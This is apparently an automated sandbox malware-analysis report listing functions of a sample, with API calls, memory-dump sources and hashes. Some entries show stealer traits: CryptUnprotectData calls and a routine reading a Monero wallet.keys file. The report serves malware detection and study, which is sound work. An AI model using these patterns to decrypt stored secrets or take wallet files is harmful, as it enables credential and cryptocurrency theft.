                        • Instruction Fuzzy Hash: 7BB217F360C2009FE304AE2DEC8567ABBE5EF94720F1A492DE6C4C7744EA3598458797
                        Function 005D3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(005DE118,00000000,00000001,005DE108,00000000), ref: 005D3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005D37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 01345a7c1b2fb427954e0007519c16e93352d700dec0d122fcf7e9f27cd36283
                        • Instruction ID: 1f3f14c79bbb8ee7da029333cbdf487a26328f5cdd5276a2d3a1141f39c83f1e
                        • Opcode Fuzzy Hash: 01345a7c1b2fb427954e0007519c16e93352d700dec0d122fcf7e9f27cd36283
                        • Instruction Fuzzy Hash: 2841F971A00A189FDB24DB58CC95B9BB7B4BB48702F4081D9E608EB2D0E7716EC5CF51
                        Function 005C9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005C9B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 005C9BA3
                        • LocalFree.KERNEL32(?), ref: 005C9BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: f697e6200aecfde99294a551fb3321ee91d5d6878fba47c11f2e91f150b5787a
                        • Instruction ID: cfc2af688473a9793e100a7bb871fe3a1e785bfd5f21f186db5558089ebcf75a
                        • Opcode Fuzzy Hash: f697e6200aecfde99294a551fb3321ee91d5d6878fba47c11f2e91f150b5787a
                        • Instruction Fuzzy Hash: 3D11C9B8A00209EFDB04DF94D989EAE77B5FF88304F104598E915A7350D770AE10CFA1
                        Function 0099177F Relevance: 4.1, Strings: 2, Instructions: 1628COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +#-$E=_;
                        • API String ID: 0-3180536403
                        • Opcode ID: 7e52ad91c6bb3b4442ca197874440d827afddd21105add7404834e004ff57ae8
                        • Instruction ID: a762ce548e9cbda1963896a7e8d73e67fbc9b36c22f761833f1049d8bddf75a2
                        • Opcode Fuzzy Hash: 7e52ad91c6bb3b4442ca197874440d827afddd21105add7404834e004ff57ae8
                        • Instruction Fuzzy Hash: E1B218F360C2009FE7046E2DEC8567ABBE9EF94720F1A4A3DE6C4C7744E63598058657
                        Function 00908BEA Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: g?|$k?e#
                        • API String ID: 0-1641547115
                        • Opcode ID: 2d5b9edfb0e264116dd141f8c52eca0339009050721b31ec7b4fc88b376bec24
                        • Instruction ID: 283155604507ae2f87f49bd674233464a40955f870903a82ef3bf38d4ff76251
                        • Opcode Fuzzy Hash: 2d5b9edfb0e264116dd141f8c52eca0339009050721b31ec7b4fc88b376bec24
                        • Instruction Fuzzy Hash: B74139B3A0C7049BF314A92DEC89766B7D6DBD4320F2A463DDA84D7785E93998018285
                        Function 0096DE1D Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: m4m_
                        • API String ID: 0-3773686785
                        • Opcode ID: 77cc00f4e3746892e48f5e9c19b257ee646f6ee03d06e4c04ae1f3198f6dc35f
                        • Instruction ID: 69207bcb4b068ca3b9e4d40ba60b8e4bc6513ac5ef1836d0468e5e48b38c83a5
                        • Opcode Fuzzy Hash: 77cc00f4e3746892e48f5e9c19b257ee646f6ee03d06e4c04ae1f3198f6dc35f
                        • Instruction Fuzzy Hash: 627126F3A186045FF3086E2CEC5177AB7DADB94320F1A453DEA89D3784E9795C0482D6
                        Function 0090F027 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: `ww^
                        • API String ID: 0-2809251080
                        • Opcode ID: c4fc57ac6d9f6b91b2f036d4214b5ad06a947ecfbd3a299f3fe569ee72faf5a6
                        • Instruction ID: 5ac6fa3c156ca10a1c6f09aa256498ed2b8b57fe824e776ad9a9bd47f6005640
                        • Opcode Fuzzy Hash: c4fc57ac6d9f6b91b2f036d4214b5ad06a947ecfbd3a299f3fe569ee72faf5a6
                        • Instruction Fuzzy Hash: A57106B39087149BE3046E39DC8576AF7E6EFD4720F16893DE6C4C3744E63958418B82
                        Function 008BC434 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: H;mW
                        • API String ID: 0-1921414146
                        • Opcode ID: 1312c2b73b59656d244ae6b2e2caa062affd68056e48a697fa8af36abcb6c1a7
                        • Instruction ID: afe98c0b2a67ae5b8fec00629a2e1f609429a1e7f043acb9993ca012fbe96615
                        • Opcode Fuzzy Hash: 1312c2b73b59656d244ae6b2e2caa062affd68056e48a697fa8af36abcb6c1a7
                        • Instruction Fuzzy Hash: B4615AF3A182105FF708593CEC9A77A76D5EB44324F1A0A3EEAC5D77C4E9698C018296
                        Function 008FDC30 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: yvmo
                        • API String ID: 0-1783713227
                        • Opcode ID: dd78634ffdbbdb39a4770288781015f5f9f88d9bdff10ddf79e185384a48bd35
                        • Instruction ID: 4e7ea9f03ce68837f6ae13afe44aeb420f47962d12898114b8d3974110f8bcc1
                        • Opcode Fuzzy Hash: dd78634ffdbbdb39a4770288781015f5f9f88d9bdff10ddf79e185384a48bd35
                        • Instruction Fuzzy Hash: 6F515BF7E482141BF304A97EDC84726B6CB9BE4720F2EC239EA54D7758F87958064192
                        Function 008F8DF4 Relevance: .2, Instructions: 203COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 663374ba5146c596184b9f4386b24de0c608d656e0818d59b795f71dcd521ff1
                        • Instruction ID: 5df6265a7e6bfa0dc9a8ba134e53dfa3b3539d067304c45f69d6cc43c5b29c7a
                        • Opcode Fuzzy Hash: 663374ba5146c596184b9f4386b24de0c608d656e0818d59b795f71dcd521ff1
                        • Instruction Fuzzy Hash: 645126F39196145FF3049A28DD8477AB6DADBD4320F2A8A3DE6D4C7784E93C48058686
                        Function 008C1EA6 Relevance: .2, Instructions: 187COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f2dd2e583364ecbd91e603f50dc84e533a1bc2025dfe59ba6a22380052e75352
                        • Instruction ID: 59493a7b6b594f005ecc7d66e1c8362f99fe4e35319247b2ff85e5248714abe5
                        • Opcode Fuzzy Hash: f2dd2e583364ecbd91e603f50dc84e533a1bc2025dfe59ba6a22380052e75352
                        • Instruction Fuzzy Hash: 325139B3A593149BE310797CDC847BBFBD5EB94320F2B853DDAC493780E93958054296
                        Function 00A13A09 Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6dfd64b263b067bb3243fac03051cbaf83bf6dbd0c2170333187094f257c08da
                        • Instruction ID: 63604d5a6e868c39eea3f98e7eaca8b517494e06c8b5342b35e361a9a379cc6a
                        • Opcode Fuzzy Hash: 6dfd64b263b067bb3243fac03051cbaf83bf6dbd0c2170333187094f257c08da
                        • Instruction Fuzzy Hash: 8B3103B240C704DFE311BF2AD8856AAFBE5FF98310F12892DDAE583614D674A444CB97
                        Function 005D9750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 005D0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
